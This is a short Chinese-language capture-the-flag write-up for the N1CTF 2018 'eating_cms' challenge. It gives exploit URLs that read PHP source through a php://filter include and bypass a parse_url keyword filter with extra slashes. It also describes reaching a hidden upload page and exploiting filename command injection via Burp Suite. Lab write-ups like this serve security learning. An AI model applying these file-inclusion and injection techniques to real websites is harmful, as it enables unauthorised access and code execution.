[N1CTF 2018]eating_cms
涉及知识
解题过程
有login.php,那估计会有register.php。注册后进入
http://1bd652e8-2ebc-4a86-a16a-a590e181b24d.node3.buuoj.cn/user.php?page=guest
url可疑,然后用php伪协议读取源码,有个小坑,读php文件不用加后缀,也只能读php
include "$page.php";
读到function.php,给了几个文件
function filter_directory()
{
$keywords = ["flag","manage","ffffllllaaaaggg"];
$uri = parse_url($_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);
// var_dump($query);
// die();
foreach($keywords as $token)
{
foreach($query as $k => $v)
{
if (stristr($k, $token))
hacker();
if (stristr($v, $token))
hacker();
}
}
}
试图读取ffffllllaaaaggg,直接爆hacker。
发现parse_url,可以加多几个/来绕过
http://1bd652e8-2ebc-4a86-a16a-a590e181b24d.node3.buuoj.cn//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
然后一直读到/templates/upload.html
发现文件上传,但是一直报404
读取upllloadddd.php源码
发现一个啥过滤都没有的文件名拼接代码执行
找上传点
http://1bd652e8-2ebc-4a86-a16a-a590e181b24d.node3.buuoj.cn/user.php?page=m4aaannngggeee
然后burpsuite抓包,改文件名
本来用cd ../,但是/过滤,于是
读取flag